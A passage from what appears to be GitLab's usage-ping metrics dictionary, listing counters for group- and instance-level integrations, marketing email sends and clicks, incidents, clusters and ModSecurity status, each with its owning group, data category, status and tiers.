`Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.groups_inheriting_slack_slash_commands_active` + +Count of active groups inheriting integrations for Slack (slash commands) + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180142_groups_inheriting_slack_slash_commands_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.groups_inheriting_teamcity_active` + +Count of active groups inheriting integrations for Teamcity CI + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180153_groups_inheriting_teamcity_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.groups_inheriting_unify_circuit_active` + +Count of active groups inheriting integrations for Unifiy Circuit + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180204_groups_inheriting_unify_circuit_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.groups_inheriting_webex_teams_active` + +Count of active groups inheriting integrations for Webex Teams + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180215_groups_inheriting_webex_teams_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.groups_inheriting_youtrack_active` + +Count of active groups inheriting integrations for YouTrack + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180226_groups_inheriting_youtrack_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.groups_irker_active` + +Count of groups with active integrations for Irker + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175923_groups_irker_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.groups_jenkins_active` + +Count of groups with active integrations for Jenkins + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175934_groups_jenkins_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.groups_jira_active` + +Count of groups with active integrations for Jira + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175945_groups_jira_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.groups_mattermost_active` + +Count of groups with active integrations for Mattermost + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175956_groups_mattermost_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.groups_mattermost_slash_commands_active` + +Count of groups with active integrations for Mattermost (slash commands) + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180006_groups_mattermost_slash_commands_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.groups_microsoft_teams_active` + +Count of groups with active integrations for Microsoft Teams + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180018_groups_microsoft_teams_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.groups_mock_ci_active` + +Count of groups with active integrations for Mock CI + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216182724_groups_mock_ci_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `removed` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.groups_mock_monitoring_active` + +Count of groups with active integrations for Mock Monitoring + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216182736_groups_mock_monitoring_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `removed` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.groups_packagist_active` + +Count of groups with active integrations for Packagist + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180029_groups_packagist_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.groups_pipelines_email_active` + +Count of groups with active integrations for Pipeline Emails + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180040_groups_pipelines_email_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.groups_pivotaltracker_active` + +Count of groups with active integrations for Pivotal Tracker + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180051_groups_pivotaltracker_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.groups_prometheus_active` + +Count of groups with active integrations for Prometheus + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180933_groups_prometheus_active.yml) + +Group: `group::monitor` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.groups_pushover_active` + +Count of groups with active integrations for Pushover + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180102_groups_pushover_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.groups_redmine_active` + +Count of groups with active integrations for Redmine + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180113_groups_redmine_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.groups_slack_active` + +Count of groups with active integrations for Slack + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180124_groups_slack_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.groups_slack_slash_commands_active` + +Count of groups with active integrations for Slack (slash commands) + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180135_groups_slack_slash_commands_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.groups_teamcity_active` + +Count of groups with active integrations for Teamcity CI + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180146_groups_teamcity_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.groups_unify_circuit_active` + +Count of groups with active integrations for Unifiy Circuit + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180157_groups_unify_circuit_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.groups_webex_teams_active` + +Count of groups with active integrations for Webex Teams + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180208_groups_webex_teams_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.groups_youtrack_active` + +Count of groups with active integrations for YouTrack + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180219_groups_youtrack_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.in_product_marketing_email_create_0_cta_clicked` + +Total clicks on the create track's first email + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210510201919_in_product_marketing_email_create_0_cta_clicked.yml) + +Group: `group::activation` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.in_product_marketing_email_create_0_sent` + +Total sent emails of the create track's first email + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210510201537_in_product_marketing_email_create_0_sent.yml) + +Group: `group::activation` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.in_product_marketing_email_create_1_cta_clicked` + +Total clicks on the create track's second email + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210510202356_in_product_marketing_email_create_1_cta_clicked.yml) + +Group: `group::activation` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.in_product_marketing_email_create_1_sent` + +Total sent emails of the create track's second email + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210510202148_in_product_marketing_email_create_1_sent.yml) + +Group: `group::activation` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.in_product_marketing_email_create_2_cta_clicked` + +Total clicks on the create track's third email + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210510202724_in_product_marketing_email_create_2_cta_clicked.yml) + +Group: `group::activation` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.in_product_marketing_email_create_2_sent` + +Total sent emails of the create track's third email + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210510202604_in_product_marketing_email_create_2_sent.yml) + +Group: `group::activation` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.in_product_marketing_email_experience_0_sent` + +Total sent emails of the experience track's first email + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210518081225_in_product_marketing_email_experience_0_sent.yml) + +Group: `group::activation` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.in_product_marketing_email_team_0_cta_clicked` + +Total clicks on the team track's first email + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210510203143_in_product_marketing_email_team_0_cta_clicked.yml) + +Group: `group::activation` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.in_product_marketing_email_team_0_sent` + +Total sent emails of the team track's first email + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210510203134_in_product_marketing_email_team_0_sent.yml) + +Group: `group::activation` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.in_product_marketing_email_team_1_cta_clicked` + +Total clicks on the team track's second email + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210510203203_in_product_marketing_email_team_1_cta_clicked.yml) + +Group: `group::activation` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.in_product_marketing_email_team_1_sent` + +Total sent emails of the team track's second email + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210510203153_in_product_marketing_email_team_1_sent.yml) + +Group: `group::activation` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.in_product_marketing_email_team_2_cta_clicked` + +Total clicks on the team track's third email + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210510203223_in_product_marketing_email_team_2_cta_clicked.yml) + +Group: `group::activation` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.in_product_marketing_email_team_2_sent` + +Total sent emails of the team track's third email + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210510203213_in_product_marketing_email_team_2_sent.yml) + +Group: `group::activation` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.in_product_marketing_email_trial_0_cta_clicked` + +Total clicks on the verify trial's first email + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210510203044_in_product_marketing_email_trial_0_cta_clicked.yml) + +Group: `group::activation` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.in_product_marketing_email_trial_0_sent` + +Total sent emails of the trial track's first email + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210510203035_in_product_marketing_email_trial_0_sent.yml) + +Group: `group::activation` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.in_product_marketing_email_trial_1_cta_clicked` + +Total clicks on the trial track's second email + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210510203104_in_product_marketing_email_trial_1_cta_clicked.yml) + +Group: `group::activation` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.in_product_marketing_email_trial_1_sent` + +Total sent emails of the trial track's second email + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210510203054_in_product_marketing_email_trial_1_sent.yml) + +Group: `group::activation` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.in_product_marketing_email_trial_2_cta_clicked` + +Total clicks on the trial track's third email + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210510203124_in_product_marketing_email_trial_2_cta_clicked.yml) + +Group: `group::activation` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.in_product_marketing_email_trial_2_sent` + +Total sent emails of the trial track's third email + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210510203114_in_product_marketing_email_trial_2_sent.yml) + +Group: `group::activation` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.in_product_marketing_email_verify_0_cta_clicked` + +Total clicks on the verify track's first email + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210510202943_in_product_marketing_email_verify_0_cta_clicked.yml) + +Group: `group::activation` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.in_product_marketing_email_verify_0_sent` + +Total sent emails of the verify track's first email + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210510202807_in_product_marketing_email_verify_0_sent.yml) + +Group: `group::activation` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.in_product_marketing_email_verify_1_cta_clicked` + +Total clicks on the verify track's second email + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210510203005_in_product_marketing_email_verify_1_cta_clicked.yml) + +Group: `group::activation` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.in_product_marketing_email_verify_1_sent` + +Total sent emails of the verify track's second email + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210510202955_in_product_marketing_email_verify_1_sent.yml) + +Group: `group::activation` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.in_product_marketing_email_verify_2_cta_clicked` + +Total clicks on the verify track's third email + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210510203025_in_product_marketing_email_verify_2_cta_clicked.yml) + +Group: `group::activation` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.in_product_marketing_email_verify_2_sent` + +Total sent emails of the verify track's third email + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210510203015_in_product_marketing_email_verify_2_sent.yml) + +Group: `group::activation` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.in_review_folder` + +Missing description + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216181916_in_review_folder.yml) + +Group: `group::release` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free` + +### `counts.incident_issues` + +Count of incidents (issues where issue_type=incident) + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180447_incident_issues.yml) + +Group: `group::monitor` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.incident_labeled_issues` + +Count of all issues with the label=incident + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180451_incident_labeled_issues.yml) + +Group: `group::monitor` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.ingress_modsecurity_blocking` + +Whether or not ModSecurity is set to blocking mode + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175452_ingress_modsecurity_blocking.yml) + +Group: `group::container security` + +Data Category: `Operational` + +Status: `removed` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.ingress_modsecurity_disabled` + +Whether or not ModSecurity is disabled within Ingress + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175454_ingress_modsecurity_disabled.yml) + +Group: `group::container security` + +Data Category: `Operational` + +Status: `removed` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.ingress_modsecurity_logging` + +Whether or not ModSecurity is set to logging mode + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175450_ingress_modsecurity_logging.yml) + +Group: `group::container security` + +Data Category: `Operational` + +Status: `removed` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.ingress_modsecurity_not_installed` + +Whether or not ModSecurity has not been installed into the cluster + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175456_ingress_modsecurity_not_installed.yml) + +Group: `group::container security` + +Data Category: `Operational` + +Status: `removed` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.ingress_modsecurity_packets_anomalous` + +Cumulative count of packets identified as anomalous by ModSecurity since Usage Ping was last reported + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175444_ingress_modsecurity_packets_anomalous.yml) + +Group: `group::container security` + +Data Category: `Operational` + +Status: `removed` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.ingress_modsecurity_packets_processed` + +Cumulative count of packets processed by ModSecurity since Usage Ping was last reported + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175442_ingress_modsecurity_packets_processed.yml) + +Group: `group::container security` + +Data Category: `Operational` + +Status: `removed` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.ingress_modsecurity_statistics_unavailable` + +Whether or not ModSecurity statistics are unavailable + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_all/20210216175441_ingress_modsecurity_statistics_unavailable.yml) + +Group: `group::container security` + +Data Category: `Operational` + +Status: `removed` + +Tiers: `ultimate` + +### `counts.instance_clusters_disabled` + +Total GitLab Managed disabled clusters previously attached to the instance + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175248_instance_clusters_disabled.yml) + +Group: `group::configure` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.instance_clusters_enabled` + +Total GitLab Managed clusters attached to the instance + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175240_instance_clusters_enabled.yml) + +Group: `group::configure` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.instances_asana_active` + +Count of active instance-level integrations for Asana + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175628_instances_asana_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.instances_assembla_active` + +Count of active instance-level integrations for Assembla + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175640_instances_assembla_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.instances_bamboo_active` + +Count of active instance-level integrations for Bamboo CI + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175651_instances_bamboo_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.instances_bugzilla_active` + +Count of active instance-level integrations for Bugzilla + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175702_instances_bugzilla_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.instances_buildkite_active` + +Count of active instance-level integrations for Buildkite + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175714_instances_buildkite_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.instances_campfire_active` + +Count of active instance-level integrations for Campfire + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175725_instances_campfire_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.instances_confluence_active` + +Count of active instance-level integrations for Confluence + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175736_instances_confluence_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.instances_custom_issue_tracker_active` + +Count of active instance-level integrations for a Custom Issue Tracker + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175747_instances_custom_issue_tracker_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.instances_datadog_active` + +Count of active instance-level integrations for Datadog + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216182553_instances_datadog_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.instances_discord_active` + +Count of active instance-level integrations for Discord + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175758_instances_discord_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.instances_drone_ci_active` + +Count of active instance-level integrations for Drone CI + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175809_instances_drone_ci_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.instances_emails_on_push_active` + +Count of active instance-level integrations for Emails on Push + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175820_instances_emails_on_push_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.instances_ewm_active` + +Count of active instance-level integrations for EWM + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216182620_instances_ewm_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.instances_external_wiki_active` + +Count of active instance-level integrations for External Wiki + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175831_instances_external_wiki_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.instances_flowdock_active` + +Count of active instance-level integrations for Flowdock + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175842_instances_flowdock_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.instances_github_active` + +Count of active instance-level integrations for GitHub + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_all/20210216175853_instances_github_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `counts.instances_hangouts_chat_active` + +Count of active instance-level integrations for Hangouts Chat + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175904_instances_hangouts_chat_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.instances_hipchat_active` + +Count of active instance-level integrations for HipChat + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175915_instances_hipchat_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `removed` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.instances_irker_active` + +Count of active instance-level integrations for Irker + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175926_instances_irker_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.instances_jenkins_active` + +Count of active instance-level integrations for Jenkins + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175937_instances_jenkins_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.instances_jira_active` + +Count of active instance-level integrations for Jira + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175948_instances_jira_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.instances_mattermost_active` + +Count of active instance-level integrations for Mattermost + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175959_instances_mattermost_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.instances_mattermost_slash_commands_active` + +Count of active instance-level integrations for Mattermost (slash commands) + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180010_instances_mattermost_slash_commands_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.instances_microsoft_teams_active` + +Count of active instance-level integrations for Microsoft Teams + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180021_instances_microsoft_teams_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.instances_mock_ci_active` + +Count of active instance-level integrations for Mock CI + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216182728_instances_mock_ci_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `removed` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.instances_mock_monitoring_active` + +Count of active instance-level integrations for Mock Monitoring + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216182739_instances_mock_monitoring_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `removed` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.instances_packagist_active` + +Count of active instance-level integrations for Packagist + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180032_instances_packagist_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.instances_pipelines_email_active` + +Count of active instance-level integrations for Pipeline Emails + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180043_instances_pipelines_email_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, 